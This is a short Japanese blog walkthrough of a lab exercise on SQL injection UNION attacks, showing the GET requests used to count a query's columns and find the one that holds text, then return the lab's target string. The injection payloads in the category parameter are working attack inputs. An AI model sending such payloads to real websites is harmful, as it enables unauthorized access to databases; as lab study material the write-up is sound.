shikata ga nai

Private? There is no such things.

SQL injection UNION attack, finding a column containing textをやってみた

Hello there, ('ω')ノ

 

SQLインジェクションUNION攻撃でテキストを含む列の検索を。

前回に続き、今回はデータ型の模索を。

Petsカテゴリを選択して。

 

f:id:ThisIsOne:20210221161241p:plain

 

インターセプトして、リピータへ。

 

f:id:ThisIsOne:20210221161303p:plain

 

まずは、データのカラム数の確認から。

 GET /filter?category=Pets'+UNION+SELECT+NULL,NULL,NULL--

 

f:id:ThisIsOne:20210221161346p:plain

 

一つ目のカラムを文字列の置き換えてSendすると。

 GET /filter?category=Pets'+UNION+SELECT+'abc',NULL,NULL--

 

f:id:ThisIsOne:20210221161531p:plain

 

次に二つ目のカラムを文字列の置き換えてSendすると成功のレスポンスが。

 GET /filter?category=Pets'+UNION+SELECT+NULL,'abc',NULL--

 

f:id:ThisIsOne:20210221161443p:plain

 

インターセプトをオフにして確認して、表示された文字列を。

 

f:id:ThisIsOne:20210221162213p:plain

 

置き換えてSendすると。

 GET /filter?category=Pets'+UNION+SELECT+NULL,'V0D6KE',NULL--

 

f:id:ThisIsOne:20210221162248p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210221162305p:plain

 

ちなみに下記のようなリクエストをSendすると成功のレスポンスが。

これで一つ目のカラムのデータ型がわかって。

 GET /filter?category=Pets'+UNION+SELECT+123,'abc',NULL--

 

f:id:ThisIsOne:20210221161607p:plain

 

ちなみに二つ目のカラムに指定するとエラーで。

 GET /filter?category=Pets'+UNION+SELECT+NULL,123,NULL--

 

f:id:ThisIsOne:20210221161656p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain